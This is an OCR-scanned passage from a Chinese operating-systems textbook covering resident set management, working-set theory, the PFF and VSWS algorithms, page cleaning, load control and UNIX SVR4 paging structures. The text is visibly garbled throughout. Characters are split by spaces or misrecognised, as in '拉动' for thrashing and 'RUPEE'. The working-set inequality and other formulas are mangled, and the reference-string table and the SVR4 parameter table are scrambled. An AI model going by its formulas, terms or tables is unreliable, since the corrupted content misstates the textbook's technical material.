进程 在 内 存 中 分 配 固定 数目 的 页 框 用 于 执行 时 使 用 。 这 个 数目 是 在 最 初 加 载 时 ( 进程 创建 时 ) 决 
定 的 ， 可 以 根据 进程 的 类 型 (交互 、 批 处 理 、 应 用 类 ) 或 者 基于 程序 员 或 系统 管理 员 的 需要 来 确 
定 。 对 于 固定 分 配 策略 ,一 县 在 进程 的 执行 过 程 中 发 生 缺 页 中 断 ， 该 进程 的 一 页 必须 被 它 所 需要 
的 页 面 置换 。 

可 变 分 配 策略 ( variable-allocation ) 允许 分 配给 一 个 进程 的 页 框 在 该 进程 的 生命 周期 中 不 断 
地 发 生变 化 。 理 论 上 , 如 果 一 个 进程 的 缺 页 率 一 直 比 较 高 , 表明 在 该 进程 中 局 部 性 原理 表现 得 比 
较 弱 , 应 该 给 它 多 分 配 一 些 页 框 以 减 小 缺 页 率 ; 而 如 果 一 个 进程 的 缺 页 率 特别 低 ， 则 表明 从 局 部 
性 的 角度 看 该 进程 的 表现 非常 好 , 可 以 在 不 会 明显 增加 缺 页 率 的 前 提 下 减少 分 配给 它 的 页 框 。 可 
变 分 配 策略 的 使 用 和 置换 范围 的 概念 紧密 相关 ， 有 关 这 方面 的 内 容 将 在 下 一 节 讲 述 。 

可 变 分 配 策略 看 起 来 性 能 更 优 , 但 是 , 使 用 这 种 方法 的 难点 在 于 它 要 求 操作 系统 评估 活动 进 
程 的 行为 ， 这 必然 需要 操作 系统 的 软件 开销 ， 并 且 还 依赖 于 处 理 器 平台 所 提供 的 硬件 机 制 。 
置换 范围 

置换 策略 的 作用 范围 可 以 分 为 全 局 和 局 部 两 类 。 这 两 种 类 型 的 策略 都 是 在 没有 空闲 页 框 时 
由 一 个 缺 页 中 断 激活 的 。 在 选择 置换 页 时 , 局 部 置换 策略 仅仅 在 产生 这 次 缺 页 的 进程 的 驻 留 页 中 
选择 。 而 全 局 置换 策略 把 内 存 中 所 有 未 被 锁定 的 页 都 作为 置换 的 候选 页 , 而 不 管 它 们 属于 哪 一 个 
进程 。 尽管 局 部 性 策略 更 易于 分 析 , 但 是 没有 证 据 表 明 它 一 定 优 于 全 局 策略 , 全 局 策略 的 优点 在 
于 其 实现 简单 、 开 销 较 小 [CARR84，MAEK87 ]。 

置换 范围 和 驻 留 集 的 大 小 之 间 有 一 定 的 联系 ( 见 表 8.5) 固定 驻 留 集 意味 着 使 用 局 部 置换 策 
略 : 为 保持 驻 留 集 的 大 小 固定 ,从 内 在 中 移出 的 一 页 必须 由 同一 个 进程 的 另 一 页 面 置换 。 可 变 分 
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配 策略 显然 可 以 采用 全 局 置换 策略 : 内 存 中 一 个 进程 的 某 一 页 面 置 换 了 另 一 个 进程 的 某 一 页 , 将 
导致 该 进程 的 分 配 增加 一 页 ， 而 被 置换 的 另 一 个 进程 的 分 配 则 减少 一 页 。 此 外 , 可 变 分 配 和 局 部 
置换 也 是 一 种 有 效 的 组 合 ， 下 面 将 分 析 这 三 种 组 合 。 


#85 驻 留 集合 管理 












局 部 置换 
。 一 个 进程 的 次 框 数 是 固定 的 
。 从 分 配给 该 进程 的 页 框 中 选择 被 置换 的 页 
© 分 配给 一 个 进程 的 页 框 数 可 以 不 时 地 变化 ， 
用 于 保存 该 进程 的 工作 集合 
© 从 分 配给 该 进程 的 页 框 中 选择 被 置换 的 页 
固定 分 配 、 局 部 范围 

在 这 种 情况 下 , 分 配给 在 内 存 中 运行 的 进程 的 页 框 数 固定 。 当 发 生 一 次 缺 页 中 断 时 ,操作 系 
统 必 须 从 该 进程 的 当前 驻 留 页 中 选择 一 页 用 于 置换 ， 置 换算 法 可 以 使 用 前 面 讲述 过 的 那些 算法 。 

对 于 固定 分 配 策略 , 需要 事先 确定 分 配给 该 进程 的 总 页 框 数 。 这 将 根据 应 用 程序 的 类 型 和 程 
序 的 请 求 总 量 来 确定 。 这 种 方法 有 两 方面 的 缺点 : 如 果 总 页 面 数 分 配 得 过 少 , 则 会 产生 很 高 的 缺 
页 率 ， 导 致 整个 多 道 程序 设计 系统 运行 缓慢 ;如果 分 配 得 过 大 ， 则 内 存 中 只 能 有 很 少 的 几 个 程 
序 ， 处 理 器 会 有 很 多 空闲 时 间 ， 并 且 把 大 量 的 时 间 花 费 在 交换 上 。 
可 变 分 配 、 全 局 范围 

这 种 组 织 可 能 是 最 易于 实现 的 , 并 且 被 许多 操作 系统 采用 。 在 任何 给 定 的 时 间 , 内 存 中 都 有 
许多 进程 ,每 个 进程 都 分 配 到 了 一 定数 目的 页 框 。 在 典型 情况 下 ,操作 系统 还 维护 着 一 个 空闲 页 
框 列 表 。 当 发 生 一 次 缺 页 中 断 时 ， 一 个 空闲 页 框 被 添加 到 进程 的 驻 留 集中 , 并且 该 页 被 读 取 。 因 
此 ， 发 生 缺 页 中 断 的 进程 的 大 小 会 逐渐 增 大 ， 这 将 有 助 于 减少 系统 中 的 缺 页 中 断 总 量 。 

这 种 方法 的 难点 在 于 置换 页 的 选择 。 当 没有 空闲 页 框 可 用 时 , 操作 系统 必须 选择 一 个 当前 位 
于 内 存 中 的 页 框 (除了 那些 被 锁定 的 页 框 ， 如 内 核 占 据 的 页 框 ) 进行 置换 。 使 用 前 面 一 节 所 讲述 
的 任何 一 种 策略 ， 选 择 的 置换 页 可 以 属于 任何 一 个 驻 留 进程 ， 而 没有 任何 原则 用 于 确定 哪 一 个 进程 
应 该 从 它 的 驻 留 集中 失去 一 页 。 因 此 ， 驻 留 集 大 小 被 减少 的 那个 进程 可 能 并 不 是 最 适合 被 置换 的 。 

解决 可 变 分 配 、 全 局 范围 策略 潜在 性 能 问题 的 一 种 方法 是 使 用 页 缓冲 。 按 照 这 种 方法 , 选择 
置换 哪 一 页 变 得 不 太 重 要 , 因为 如 果 在 下 一 次 重 写 这 些 页 之 前 访问 到 了 这 一 页 , 则 这 一 页 还 是 可 
以 被 回收 的 。 
可 变 分 配 、 局 部 范围 

可 变 分 配 、 局 部 范围 策略 试图 克服 全 局 范围 策略 中 的 问题 ， 可 以 总 结 如 下 : 

1) 当 一 个 新 进程 被 装 入 内存 时 ， 根 据 应 用 类 型 、 程 序 要 求 或 其 他 原则 ， 给 它 分 配 一 定数 目 

的 页 框 作为 其 驻 留 集 。 使 用 预先 分 页 或 请 求 分 页 填 满 这 些 页 框 。 

2) 当 发 生 一 次 缺 页 中 断 时 ， 从 产生 缺 页 中 断 的 进程 的 驻 留 集中 选择 一 页 用 于 置换 。 

3) 不 时 地 重新 评估 进程 的 页 框 分 配 情 况 ， 增 加 或 减少 分 配给 它 的 页 框 ， 以 提高 整体 性 能 。 

在 这 个 策略 中 , 关于 增加 或 减少 驻 留 集 大 小 的 决定 必须 经 过 仔细 衡量 , 并 且 要 基于 对 活动 进 
程 将 来 可 能 的 请 求 的 评估 。 由 于 这 个 评估 有 一 定 的 开销 , 这 种 策略 比 简单 的 全 局 置换 策略 要 复杂 
得 多 ， 但 它 会 产生 更 好 的 性 能 。 

可 变 分 配 、 局 部 范围 策略 的 关键 要 素 是 用 于 确定 驻 留 集 大 小 的 原则 和 变化 的 时 间 安 排 。 在 各 
种 文献 中 ， 比 较 常 见 的 是 工作 集 策 略 ( working set strategy )。 尽 管 真正 的 工作 集 策略 很 难 实现 ， 
但 是 它 可 作为 比较 各 种 策略 的 一 个 基准 。 













。 从 内 存 中 的 所 有 可 用 页 框 中 选择 被 置换 的 
页 ; 这 导致 进程 驻 留 集 的 大 小 不 断 变化 
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工作 集 的 概念 是 由 Denning 提出 并 加 以 推广 的 [DENN68，DENN70，CENN80b ]， 它 对 于 
虚拟 内 存 的 设计 有 着 深远 的 影响 。 一 个 进程 在 虚拟 时 间 1、 参 数 为 A 的 工作 集合 W(t, A), ER 
该 进程 在 过 去 的 A 个 虚拟 时 间 单 位 中 被 访问 到 的 页 的 集合 。 

虚拟 时 间 按 如 下 方式 定义 。 考 虑 一 系列 存储 器 访问 rx(1)，r(2)，…， 其 中 (四 表示 包含 某 个 进 
程 第 i 次 产生 的 虚拟 地 址 的 页 。 时 间 通 过 存储 器 访问 来 衡量 ， 因 此 鼎 1,2,3… 表 示 进 程 的 内 部 虚拟 
有 时间。 

现在 分 别 考虑 万 的 两 个 变量 。 变量 A 是 观察 该 进程 的 虚拟 时 间 窗 口 。 工 作 集 合 的 大 小 是 关于 
窗口 大 小 的 一 个 非 减 函数 。 图 8.19 (基于 [ BACH86 |) 中 给 出 了 访问 一 个 进程 的 页 访问 序列 ， 
圆 点 表示 工作 集合 未 发 生变 化 的 时 间 单 位 。 注 意 ， 虚 拟 时 间 窗 口 越 大 , 工作 集 就 越 大 ， 这 可 以 用 
下 面 的 关系 表示 : 

Wt,4+1) 2 Wit, A) 



























































页 访问 序列 窗口 大 小 ，A 
2 3 4 5 
24 | 24 | 24 | 24 | 24 
Lus 2415 | 2415 | 2415 24 15 
18 1518 | 241518 | 241518 | 241518 | 
23 1823 | 151823 |24151823| 2415 1823 
[24 | 2324 | 182324 。 . 
17 2417 | 232417 | 1823 24 17|15 1823 2417 
18 | 1718 | 241718 ' 18 23 24 17 
24 1824 | > 241718 。 
18 | | 1824 | + | 241718 | 
17 1817 | 241817 | | . 

17 17 | 1817 : EE 
[is | | 1715 | 1715 | 181715 |24181715 
24 1524 | 171524 | 171524 : 

17 2417 | ， |] 171524 
24 © | 2417 | >: ; 

18 2418 | 172418 | 172418 [15172418 


























图 8.19 由 窗口 大 小 所 定义 的 进程 工作 集 


工作 集 同 时 还 是 一 个 关于 时 间 的 函数 。 如 果 一 个 进程 执行 了 A 个 时 间 单 位 ， 并 且 仅 仅 使 用 一 
个 页 ， 则 有 | 更 (1，A ) |=1。 如 果 许 多 不 同 的 页 可 以 快速 定位 ， 并 且 如 果 窗 口 大 小 允许 ， 工 作 集 
可 以 增长 到 和 该 进程 的 页 数 N 一样 大 。 因 此 ， 我 们 有 如 下 关系 : 

1<|W (t, A)| < min(A, N) 

图 8.20 表明 了 对 于 固定 的 A 值 ， 工 作 集 的 大 小 可 以 随时 间 变 化 的 一 种 方法 。 对 于 许多 程序 ， 
工作 集 相 对 比较 稳定 的 阶段 和 快速 变化 的 阶段 是 交替 出 现 的 。 当 一 个 进程 开始 执行 时 , 它 访问 新 
页 的 同时 也 逐渐 建立 起 一 个 工作 集 。 最 终 , 根据 局 部 性 原理 ,该 进程 将 相对 稳定 在 由 某 些 页 构成 
的 工作 集 上 。 接 下 来 的 瞬 变 阶段 反映 了 该 进程 转移 到 一 个 新 的 局 部 性 阶段 。 在 瞬 变 阶段 , RAR 
局 部 性 阶段 中 的 某 些 页 仍然 保留 在 窗口 A 中 ， 导 致 访问 新 页 时 工作 集 的 大 小 剧 增 。 当 窗口 滑 过 这 
些 页 访问 后 ， 工 作 集 的 大 小 降低 ， 直 到 它 仅 包含 那些 满足 新 的 局 部 性 的 页 。 

工作 集 的 概念 可 以 用 于 指导 有 关 驻 留 集 大 小 的 策略 : 

1) 监视 每 个 进程 的 工作 集 。 

2 ) 周期 性 地 从 一 个 进程 的 驻 留 集中 移 去 那些 不 在 它 的 工作 集中 的 页 。 这 可 以 使 用 一 个 LRU 

策略 。 

3) 只 有 当 一 个 进程 的 工作 集 在 内 存 中 时 ， 才 可 以 执行 该 进程 ( 也 就 是 说 ， 如 果 它 的 驻 留 集 

包括 了 它 的 工作 集 )。 





工作 集 大 小 











二 二 一 二 —> 时 间 
稳定 稳定 稳定 稳定 
图 8.20 关于 工作 集 大 小 的 一 个 典型 示意 图 [ MAEK87 | 

















这 个 策略 是 非常 具有 吸引 力 的 ， 因为 它 采取 了 一 个 公认 的 原理 一 一 局 部 性 原理 ,并 利用 该 原 
理 设计 了 一 个 可 以 减少 缺 页 中 断 的 内 存 管理 策略 。 遗 憾 的 是 ， 工 作 集 策略 存在 许多 问题 : 

1) 根据 过 去 并 不 总 能 预测 将 来 。 工 作 集 的 大 小 和 成 员 都 会 随 着 时 间 而 变化 ( 例如 ， 见 图 8.20 )。 

2) 为 每 个 进程 真实 地 测量 工作 集 是 不 实际 的 ， 它 需要 为 每 个 进程 的 每 次 页 访问 使 用 该 进程 

的 虚拟 时 间作 时 间 标 记 ， 然 后 为 每 个 进程 维护 一 个 基于 时 间 上 顺序 的 页 队列 。 

3) A 的 最 优 值 是 未 知 的， 并 且 它 在 任何 情况 下 都 会 变化 。 

然而 , 这 个 策略 的 思想 是 有 效 的 , 许多 操作 系统 都 试图 采用 近似 工作 集 策略 。 其 中 的 一 种 方 
法 是 并 不 集中 在 精确 的 页 访问 上 ， 而 是 在 进程 的 缺 页 率 上 。 如 图 8.11b 所 示 ， 当 增 大 一 个 进程 的 
驻 留 集 时 ， 钢 页 率 会 下 降 。 工 作 集 的 大 小 会 降 到 图 中 球 点 所 标记 的 位 置 。 因 此 ， 不 必 直 接 监 视 
工作 集 的 大 小 ,而 是 可 以 通过 监视 缺 页 率 达 到 类 似 的 结果 。 推 断 方 法 如 下 : 如 果 一 个 进程 的 缺 页 
率 低 于 某 个 最 小 国 值 , 则 可 以 通过 给 该 进程 分 配 一 个 较 小 的 驻 留 集 但 并 不 损失 该 进程 的 性 能 ( 导 
致 缺 页 增加 ), 使 得 整个 系统 都 从 中 受益 ( 其 他 进程 可 以 得 到 更 多 的 页 框 )。 如 果 一 个 进程 的 缺 页 
率 超过 某 个 最 大 阅 值 ， 则 可 以 在 不 降低 整个 系统 的 性 能 的 前 提 下 , 增 大 该 进程 的 驻 留 集 , 使 得 该 
进程 从 中 受益 ( 导致 缺 页 中 断 减少 ) 

遵循 该 策略 的 一 种 算法 是 缺 页 中 断 频率 ( Page Fault Frequency, PFF ) 算法 [| CHU72, 
GUPT78 ]。 该 算法 要 求 内 存 中 的 每 一 页 都 有 一 个 使 用 位 与 之 关联 。 当 一 个 页 被 访问 时 ， 相 应 的 
使 用 位 被 置 为 1， 当 发 生 一 次 缺 页 中 断 时 ， 操 作 系 统 记 录 该 进程 从 上 一 次 缺 页 中 断 到 现在 的 虚拟 
时 间 , 这 可 以 通过 维护 一 个 页 访问 计数 器 来 实现 。 定义 一 个 阅 值 已， 如 果 从 上 一 次 缺 页 中 断 到 这 
一 次 的 时 间 小 于 下 , 则 这 一 页 被 加 入 到 该 进程 的 驻 留 集中 ; 否则 淘汰 所 有 使 用 位 为 0 的 页 ,缩减 
驻 留 集 大 小 。 同 时 ， 把 其 余 页 的 使 用 位 重新 置 为 0。 可 以 通过 使 用 两 个 阐 值 对 该 算法 进行 改进 ; 
一 个 是 用 于 引发 驻 留 集 大 小 增加 的 最 高 阔 值 ， 一 个 是 用 于 引发 驻 留 集 大 小 缩小 的 最 低 阐 值 。 

缺 页 中 断 发 生 的 时 间 间 隔 和 人 缺 页 率 呈 倒数 关系 。 尽 管 最 好 能 维持 一 个 运行 时 的 平均 缺 页 率 ， 
但 是 要 允许 根据 缺 页 率 决定 驻 留 集 的 大 小 , 使 用 时 间 间 隔 来 度量 是 一 种 比较 合理 的 折 中 。 如 果 使 
用 页 缓冲 对 该 策略 进行 补充 ， 则 会 达到 一 个 相当 好 的 性 能 。 

PFF 方法 的 一 个 主要 缺点 是 , 如果 要 转移 到 新 的 局 部 性 阶段 , 则 在 过 渡 过 程 中 它 的 执行 效果 
不 太 好 。 对 于 PFF, 只 有 从 上 一 次 访问 开始 经 过 下 单位 时 间 还 没有 再 被 访问 的 页 才 会 淘汰 出 驻 留 
Æo 而 在 局 部 性 之 间 的 过 渡 期 间 , 快速 而 连续 的 缺 页 中 断 导 致 该 进程 的 驻 留 集 在 旧 局 部 性 中 的 页 
被 逐 出 之 前 快速 膨胀 。 在 内 存 突 发 请 求 高 峰 时 ,可 能 会 产生 不 必要 的 进程 去 活 和 再 激活 , 以 及 相 
应 的 切换 和 交换 开销 。 
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试图 解决 这 种 局 部 性 过 渡 问 题 且 开销 低 于 PFF 的 一 种 方法 是 可 变 采样 间隔 的 工作 集 
( Variable-interval Sampled Working Set, VSWS ) 策略 [ FERR83 ]。VSWS 策略 根据 经 过 的 虚拟 
时 间 在 采样 实例 中 评估 一 个 进程 的 工作 集 。 在 采样 区 间 的 开始 处 , 该 进程 的 所 有 驻 留 页 的 使 用 位 
REE; ERB, 只 有 在 这 个 区 间 中 被 访问 过 的 页 才 设 置 它们 的 使 用 位 , 这 些 页 在 下 一 个 区 间 
期 间 仍 将 保留 在 驻 留 集中 , 而 其 他 页 则 被 淘汰 出 驻 留 集 。 因此 驻 留 集 的 大 小 只 能 在 一 个 区 间 的 末 
尾 处 减 小 。 在 每 个 区 间 中 ,任何 缺 页 中 断 都 导致 该 页 被 添加 到 驻 留 集中 ; 因此 , 在 该 区 间 中 驻 留 
集 保持 固定 或 增长 。 

VSWS 策略 由 三 个 参数 驱动 : 

M 表示 采样 区 间 的 最 大 宽度 

工 表 示 采 样 区 间 的 最 小 宽度 

2 表示 采样 实例 间 允 许 发 生 的 缺 页 中 断 数目 

VSWS 策略 如 下 

1) 如 果 自 从 上 一 次 采样 实例 到 现在 的 单位 时 间 达 到 元， 则 挂 起 该 进程 并 扫描 使 用 位 。 

2) 如 果 在 这 个 长 度 为 工 的 虚拟 时 间 区 间 中 ， 发 生 了 O 次 缺 页 中 断 ， 

a) 如 果 自 从 上 一 次 采样 实例 到 现在 的 时 间 小 于 M， 则 一 直 等 待 直到 经 过 的 虚拟 时 间 到 
达 M 时， 挂 起 该 进程 并 扫描 使 用 位 。 
b) 如 果 自 从 上 一 次 采样 实例 到 现在 的 时 间 大 于 或 等 于 M， 则 挂 起 该 进程 并 扫描 使 用 位 。 

选择 参数 值 , 使 得 在 上 一 次 扫描 后 发 生 第 O 次 缺 页 中 断 时 能 正常 地 激活 采样 (情况 2b ), 另 
外 两 个 参数 (MAL) 为 异常 条 件 提 供 边 界 保 护 。VSWS 策略 试图 通过 增加 采样 频率 , 减少 由 于 
突然 的 局 部 性 间 过 渡 而 引发 的 内 存 请 求 高 峰 , 从 而 使 得 当 缺 页 中 断 速 度 增加 时 , 能 减少 未 使 用 页 
被 淘汰 出 驻 留 集 的 速度 。 该 技术 在 BULL 主机 操作 系统 GCOS 8 中 的 使 用 经 验 表 明 , 这 种 方法 和 
PFF 一 样 实现 简单 ， 并 且 更 为 有 效 [ PIZZ89 ]。 


8.2.5 清除 策略 


清除 策略 与 读 取 策 略 相 反 , 它 用 于 确定 在 何 时 将 一 个 被 修改 过 的 页 写 回 辅 存 。 通常 有 两 种 选 
择 : 请 求 式 清除 和 预约 式 清 除 。 对 于 请 求 式 清除 ， 只 有 当 一 页 被 选择 用 于 置换 时 才 被 写 回 辅 存 ; 
而 预约 式 清除 策略 将 这 些 被 修改 的 多 个 页 在 需要 用 到 它们 所 占据 的 页 框 之 前 成 批 地 写 回 辅 存 。 

完全 使 用 任何 一 种 策略 都 存在 危险 。 对 于 预约 式 清除 , 一 个 被 写 回 辅 存 的 页 可 能 仍然 留 在 内 
存 中 ， 直 到 页 面 置 换算 法 指示 它 被 移出 。 预 约 式 清 除 允 许 成 批 地 写 页 ， 但 这 并 没有 太 大 的 意义 ， 
因为 这 些 页 中 的 大 部 分 常常 会 在 被 置换 之 前 又 被 修改 。 辅 存 的 传送 能 力 是 有 限 的 , 不 应 该 浪费 在 
实际 上 不 太 需 要 的 清除 操作 上 。 

另 一 方面 , 对 于 请 求 式 清除 , 写 出 一 个 被 修改 的 页 和 读 和 人 一 个 新 页 是 成 对 出 现 的 , 并 且 写 出 
在 读 人 之 前 。 这 种 技术 可 以 减少 写 页 , 但 它 意味 着 发 生 缺 页 中 断 的 进程 在 解除 阻塞 之 前 必须 等 待 
两 次 页 传送 ， 这 可 能 降低 处 理 器 的 利用 率 。 

一 种 比较 好 的 方法 是 结合 页 缓冲 技术 , 该 技术 允许 采用 下 面 的 策略 : 只 清除 可 以 用 于 置换 的 
页 , 但 去 除了 清除 和 置换 操作 之 间 的 成 对 关系 。 通 过 页 缓冲 ,被 置换 页 可 以 放置 在 两 个 表 中 : 修 
改 和 未 修改 。 修 改 表 中 的 页 可 以 周期 性 地 成 批 写 出 , 并 移 到 未 修改 表 中 。 未 修改 表 中 的 一 页 或 者 
因为 被 访问 到 而 被 回收 ,或 者 当 它 的 页 框 分 配给 另 一 页 时 被 淘汰 。 


8.2.6 ”加 载 控 制 
加 载 控制 会 影响 到 驻 留 在 内 存 中 的 进程 数目 , 这 称 做 系统 并 发 度 。 加 载 控制 策略 在 有 效 的 内 
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存 管理 中 是 非常 重要 的 。 如 果 某 一 时 刻 驻 留 的 进程 太 少 , 所 有 进程 都 同时 处 于 被 阻塞 状态 的 概率 
可 能 比较 大 ， 因 而 会 有 许多 时 间 花 费 在 交换 上 。 另 一 方面 ， 如 果 驻 留 的 进程 太 多 ,平均 每 个 进程 
的 驻 留 集合 大 小 将 会 不 够 用 ， 就 会 频繁 发 生 缺 页 中 断 ， 从 而 导致 拉动 。 
系统 并 发 度 

图 8.21 说 明了 笠 动 的 情况 。 当 系统 并 发 度 从 一 个 较 小 的 值 开始 增加 时 ， 由 于 很 少 会 出 现 所 
有 驻 留 进程 都 被 阻塞 的 情况 ,因此 会 看 到 处 理 器 的 利用 率 增 

K. 但 是 ， 当 到 某 一 点 时 , 平均 驻 留 集 不 够 用 了 ,此 时 缺 页 
中 断 数 目 迅 速 增加 ， 从 而 处 理 器 的 利用 率 下 降 。 

解决 这 个 问题 可 以 有 多 种 途径 ,工作 集 或 缺 页 中 断 频 率 
算法 都 隐 含 了 加 载 控 制 。 只 有 那些 驻 留 集 足 够 大 的 进程 才 允 
许 执行 。 在 为 每 个 活动 进程 提供 需要 的 驻 留 集 大 小 时 ,该 策 


处 理 器 利用 率 








略 自 动 并 且 动 态 地 确定 活动 程序 的 数目 。 jo 
Denning 等 人 提出 的 另 一 种 方法 [ DENN80b J, RAK L 多 道 程序 设计 级 
二 S 准则, 它 通 过 调整 系统 并 发 度 ， 使 得 缺 页 中 斯 之 间 的 平 图 8.21 多 道 程序 设计 效果 


均 时 间 等 于 处 理 一 次 缺 页 中 断 所 需要 的 平均 时 间 。 性 能 研究 
表明 ， 在 这 种 情况 下 处 理 器 的 利用 率 达 到 最 大 。[ LERO76 ] 中 提出 了 一 个 具有 类 似 效果 的 策略 ， 
BD 50% 准 则 ， 它 试图 使 分 页 设备 的 利用 率 保持 在 50%. 同样 ,性 能 研究 也 表明 这 种 情况 下 处 理 器 
的 利用 率 最 大 。 
另 一 种 方法 适合 前 面 给 出 的 时 钟 页 面 置换 算法 ( 如 图 8.16 所 示 )。[ CARR84 ] 描述 了 一 种 使 
用 全 局 范围 的 技术 。 它 监视 该 算法 中 扫描 页 框 的 指针 循环 缓冲 区 的 速度 。 如果 速度 低 于 一 个 给 定 
的 最 小 阔 值 ， 则 表明 如 下 的 一 种 或 两 种 情况 : 
1) 很 少 发 生 缺 页 中 断 ， 所 以 很 少 需要 请 求 指针 前 进 。 
2 ) 对 每 个 请 求 ， 指 针 扫 描 的 平均 页 框 数 很 小 ， 表 明 有 许多 驻 留 页 未 被 访问 到 ， 并 且 均 易于 
被 置换 。 
在 这 两 种 情况 下 ， 系统 并 发 度 可 以 安全 地 增加 。 另 一 方面 ,如 果 指 针 的 扫描 速度 超过 一 个 最 
大 阔 值 ， 则 表明 或 者 缺 页 率 很 高 ， 或 者 很 难 找到 可 置换 页 ， 这 暗示 着 系统 并 发 度 太 高 了 。 
进程 挂 起 
如 果 系 统 并 发 度 被 减 小 ， 则 一 个 或 多 个 当前 驻 留 进程 必须 被 挂 起 ( 换 出 )。[ CARR84 ] 列 出 
T 6 种 可 能 性 : 
@ 最 低 优先 级 进程 : 实现 调度 策略 决策 ， 与 性 能 问题 无 关 。 
© RUPEE: 原因 是 很 有 可 能 是 缺 页 中 断 任务 的 工作 集 还 没有 驻 留 ， 因 而 挂 起 它 对 性 
能 的 影响 最 小 。 此 外 ， 由 于 它 阻塞 了 一 个 一 - 定 将 要 被 阻塞 的 进程 ， 并 且 消 除了 页 面 置换 
和 LO 操作 的 开销 ， 因 而 该 选择 可 以 立即 收 到 成 效 。 
@ 最 后 一 个 被 激活 的 进程 这 个 进程 的 工作 集 最 有 可 能 还 没有 驻 留 。 
@ 驻 留 集 最 小 的 进程 : 在 将 来 再 装 人 时 所 需要 的 代价 最 小 。 但 是 ， 它 不 利于 局 部 性 较 小 的 
程序 。 
@ 最 大 空间 的 进程 ; 这 可 以 在 一 个 过 量 使 用 的 内 存 中 得 到 最 多 的 空闲 页 框 ， 使 得 不 会 很 快 
又 处 于 去 活 状态 。 
@ 具有 最 大 剩余 执行 窗口 的 进程 : 在 大 多 数 进 程 调度 方案 中 ， 一 个 进程 在 被 中 断 或 者 放置 
在 就 绪 队 列 末 尾 之 前 只 运行 一 定 的 时 间 。 这 近似 于 最 短处 理 时间 优 先 的 调度 原则 。 


P&E MB RMA FH 257 


在 操作 系统 设计 的 许多 其 他 领域 中 , 选择 哪 一 个 策略 取决 于 操作 系统 中 许多 其 他 设计 因素 
以 及 要 执行 的 程序 的 特点 。 


8.3 UNIX 和 Solaris 内 存 管理 


由 于 UNIX 的 目标 是 与 机 器 无 关 的 ， 因 而 它 的 内 存 管理 方案 因 系统 的 差异 而 不 同 。 早 期 的 
UNIX 版 本 仅仅 使 用 可 变 分 区 , 而 未 使 用 虚拟 存储 方案 。 目 前 的 UNIX 和 Solaris 实现 , 已 经 使 用 
了 分 页 式 的 虚拟 内 存 。 

在 SVR4 和 Solaris 中 ,实际 上 有 两 个 独立 的 内 存 管理 方案 。 分 页 系统 提供 了 一 种 虚拟 存 
储 能 力 ， 以 给 进程 分 配 内 存 中 的 页 框 ， 并 且 给 磁盘 块 缓 冲 分 配 页 框 。 尽 管 对 用 户 进 程 和 磁盘 
IO 来 说 , 这 是 一 种 有 效 的 内 存 管理 方案 , 但 是 分 页 式 的 虚拟 内 存 不 适合 为 内 核 分 配 内 存 的 管 
理 。 为 实现 这 一 目标 ， 使 用 了 内 核 内 存 分 配器 (kernel memory allocator )。 下 面 依次 介绍 这 两 
种 机 制 。 


8.3.1 分 页 系统 


数据 结构 

对 于 分 页 式 虚 拟 内 存 , UNIX 使 用 了 许多 与 机 器 无 关 的 数据 结构 , 并 进行 了 一 些小 的 调整 ( 如 
图 8.22 和 表 8.6 所 示 ): 

ORR: 典型 情况 下 ， 每 个 进程 都 有 一 个 页 表 ， 该 进程 在 虚拟 内 存 中 的 每 一 页 都 在 页 表 中 

有 一 项 。 

© 磁盘 块 描述 符 : 与 进程 的 每 一 页 相关 联 的 是 表 中 的 项 ， 它 措 述 了 虚拟 页 的 磁盘 副本 。 

© 页 框 数据 表 : 描述 了 实 存 中 的 每 个 页 框 ， 并 且 以 页 框 号 为 索引 。 该 表 用 于 置换 算法 。 

@ 可 交换 表 : 每 个 交换 设备 都 有 一 个 可 交换 表 ， 该 设备 的 每 一 页 都 在 表 中 有 一 项 。 






a) 页 表 项 


b) 磁盘 块 描述 符 


O 页 框 数据 表 的 表 项 


d) 交换 使 用 表 的 表 项 
图 8.22 UNIX SVR4 内 存 管理 格式 


R 8.6 定义 的 大 多 数 域 都 是 自 解释 的 。 页 表 项 中 的 年 龄 域 表 明 自 从 程序 上 一 次 访问 这 一 页 杠 
到 现在 持续 了 多 久 ， 但 这 个 域 的 位 数 和 更 新 频率 取决 于 不 同 的 实现 版 本 。 困 此 ， 并 不 是 所 有 的 
UNIX 页 面 置 换 策略 都 用 到 这 个 域 。 
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k86 UNIX SVR4 内 存 管理 参数 


RR 
页 框 号 指向 实 存 中 的 页 框 
年 龄 表示 页 在 内 存 中 已 经 有 多 久未 被 访问 到 。 该 域 的 长 度 和 内 容 依赖 于 处 理 占 
当 有 多 个 进程 共享 一 页 时 设置 。 如 果 一 个 进程 往 页 中 写 过 ,必须 首先 为 其 他 共享 这 一 页 的 
写 时 复制 进程 生成 该 页 的 单独 副本 。 这 个 特征 允许 复制 操作 延迟 到 页 表 项 需要 时 才 进 行 ， 从 而 避免 不 
必要 的 操作 
修改 表明 该 页 已 被 修改 过 
oe 表明 该 页 已 被 访问 过 。 当 该 页 第 一 次 被 装 人 时 ， 该 位 被 置 成 0， 然 后 由 页 面 置 换算 法 周 其 
性 地 重新 设置 
有 效 表明 该 页 在 内 存 中 
保护 表明 是 否 允 许 写 操作 
磁盘 块 描述 符 
交换 设备 号 保存 有 相应 页 的 辅 存 的 逻辑 设备 号 。 人 允许 有 多 个 设备 用 于 交换 
设备 块 号 交换 设置 中 页 所 在 的 块 单元 
存储 的 可 以 是 交换 单位 或 可 执行 文件 。 对 后 一 种 情况 ， 有 一 个 关于 待 分 配 的 虚拟 内 存 是 否 
存储 类 型 ii i 
要 先 清空 的 指示 
页 框 数据 表 的 表 项 
表明 该 页 框 是 可 用 的 还 是 已 经 有 一 个 相关 联 的 页 。 对 于 后 一 种 情况 ,该 页 的 状态 是 在 交换 
设备 中 、 可 执行 文件 中 或 DMA 过 程 中 被 确定 的 
访问 计数 访问 该 页 的 进程 数 
逻辑 设备 包含 有 该 页 副本 的 逻辑 设备 
块 号 逻辑 设备 中 该 页 副本 所 在 的 块 单元 
pfdata 指针 指向 空闲 页 链表 中 和 页 的 散 列 队列 中 其 他 pfdata 表 项 的 指针 
CET rT 
访问 计数 指向 交换 设备 中 某 一 页 的 页 表 项 的 数目 
页 /存储 单元 号 存储 单元 中 的 页 标识 符 


磁盘 块 描述 符 中 需要 有 存储 域 类 型 的 原因 如 下 : 当 一 个 可 执行 文件 第 一 次 用 于 创建 一 个 新 进 
BN, 该 文件 只 有 一 部 分 程序 和 数据 可 以 被 装 入 实 存 。 后 来 当 发 生 缺 页 中 断 时 , 新 的 一 部 分 程序 


和 数据 被 装 入 。 只 有 在 第 一 次 装 入 时 ， 才 创建 虚 存 页 ， 
